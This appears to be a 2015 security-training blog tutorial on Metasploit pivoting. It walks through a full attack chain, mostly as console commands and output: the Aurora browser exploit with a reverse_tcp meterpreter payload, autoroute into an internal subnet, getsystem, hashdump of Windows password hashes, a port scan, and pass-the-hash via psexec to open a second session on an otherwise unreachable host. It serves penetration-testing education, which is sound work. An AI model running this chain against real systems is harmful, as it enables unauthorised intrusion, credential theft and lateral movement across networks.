Home 0P3N Blog Metasploit: Routing Traffic from a Non-Routable Network
Ready to Start Your Career?
Create Free Account
Multi Thinkers profile image
By: Multi Thinker
July 14, 2015

Metasploit: Routing Traffic from a Non-Routable Network

By: Multi Thinker
July 14, 2015
Multi Thinkers profile image
By: Multi Thinker
July 14, 2015
twisting-light-cybraryAccording to Offensive-Security:
Pivoting is the unique technique of using an instance (also referred to as a ‘plant’ or ‘foothold’) to be able to “move” around inside a network. Basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible systems.

In this scenario, we'll be using it for routing traffic from a normally non-routable network.

 For this, we'll use exploit "exploit/windows/browser/ms10_002_aurora"
msf > use exploit/windows/browser/ms10_002_aurora we need to set URIPATH with LHOSTmsf exploit(ms10_002_aurora) > set URIPATH /URIPATH => /msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ms10_002_aurora) > set LHOST xx.xx.xx.xxLHOST => xx.xx.xx.xx
 With a lookup on sessions, we have:
msf exploit(ms10_002_aurora) > sessions -lNow we need subnet mask and route discovery for that meterpreter > run autoroute -h[*] Usage:   run autoroute [-r] -s subnet -n netmask[*] Examples:[*]   run autoroute -s xx.x.x.x -n # Add a route to x.x.x.x/[*]   run autoroute -s x.x.x.x                # Netmask defaults to[*]   run autoroute -s x.x.x.x/24             # CIDR notation is also okay[*]   run autoroute -p                        # Print active routing table[*]   run autoroute -d -s x.x.x.x             # Deletes the x.x.x.x/ route[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routesmeterpreter > run autoroute -s x.x.x.x/24[*] Adding a route to x.x.x.x/[+] Added route to x.x.x.x/ via[*] Use the -p option to list all active routesmeterpreter > run autoroute -pActive Routing Table====================   Subnet             Netmask            Gateway   ------             -------            -------   x.x.x.x      Session 1
 Why did I do this? We need to route and act like that IP in the step session. Try typing ifconfig and you'll see your victim in your route. We need to use that IP, so I've routed that with subnet masks.Now, we need to access that system, too. Let's get it by typing getsytem and exploit with the pass the hash method recently explained.
meterpreter > getsystem...got system (via technique 1).meterpreter > run hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY c2ec80f879c1123b5dc8d24f1xxe2c37a45...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hashes...Administrator:500:81cbcea8a9af9as3bbaad3b435b51404ee:561cbdae13dded5abd30aa94ddeb3cf52d:::Guest:501:aad3b435b51404eeaad3sd435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::HelpAssistant:1000:9a6ae26408b0629ddc621c90c897b42d:07a59dbe14e2ea9c4792e2f189e2de3a:::SUPPORT_s388945a0:1002:aad3b435b51404eeaad3b435b51das404ee:ebf9fa44b3204029db5a8a77f5350160:::Thinker:1004:81casbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5aasbd30aa94ddeb3cf52d:::
We need to bind_tcp over the network. For that, we can use TCP exploit in meterpreter.
msf exploit(ms10_002_aurora) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > show optionsModule options:   Name         Current Setting  Required  Description   ----         ---------------  --------  -----------   CONCURRENCY  10               yes       The number of concurrent ports to check per host   FILTER                        no        The filter string for capturing traffic   INTERFACE                     no        The name of the interface   PCAPFILE                      no        The name of the PCAP capture file to process   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)   RHOSTS                        yes       The target address range or CIDR identifier   SNAPLEN      65535            yes       The number of bytes to capture   THREADS      1                yes       The number of concurrent threads   TIMEOUT      1000             yes       The socket connect timeout in milliseconds   VERBOSE      false            no        Display verbose outputmsf auxiliary(tcp) > set RHOSTS x.x.x.x/24RHOST => x.x.x.x/24msf auxiliary(tcp) > set PORTS 179,445PORTS => 179,445msf auxiliary(tcp) > set THREADS 20THREADS => 20msf auxiliary(tcp) > run[*] x.x.x.x:445 - TCP OPEN
Follow the steps to pass the hash and tcp_bind for pivoting:
msf auxiliary(tcp) > use exploit/windows/smb/psexec msf exploit(psexec) > show optionsModule options:   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   RHOST                       yes       The target address   RPORT      445              yes       Set the SMB service port   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication   SMBPass                     no        The password for the specified username   SMBUser                     no        The username to authenticate asExploit target:   Id  Name   --  ----   0   Automaticmsf exploit(psexec) > set RHOST x.x.x.xRHOST => x.x.x.xmsf exploit(psexec) > set SMBUser AdministratorSMBUser => Administratormsf exploit(psexec) > set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52dSMBPass => 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52dmsf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcpPAYLOAD => windows/meterpreter/bind_tcpmsf exploit(psexec) > exploit[*] Connecting to the server...[*] Started bind handler[*] Authenticating to x.x.x.x:445|WORKGROUP as user 'Administrator'...[*] Uploading payload...[*] Created qANuICKyR.exe...[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:x.x.x.x[svcctl] ...[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:x.x.x.x[svcctl] ...[*] Obtaining a service manager handle...[*] Creating a new service (UOtrbJMd - "AuiSy")...[*] Closing service handle...[*] Opening service...[*] Starting the service...[*] Removing the service...[*] Closing service handle...[*] Deleting ssWSdV.exe...[*] Sending stage (749056 bytes)[*] Meterpreter session 2 opened ( -> x.x.x.x:4444) at Mon Jul 11 12:56:42 -0700 2015
 Voila! We've done it. Just type ipconfig to see that we are using our victim's connection and are connected to that system that wasn't normally connected (it was not on a LAN or any other connection ). -- Multi Thinker
Schedule Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry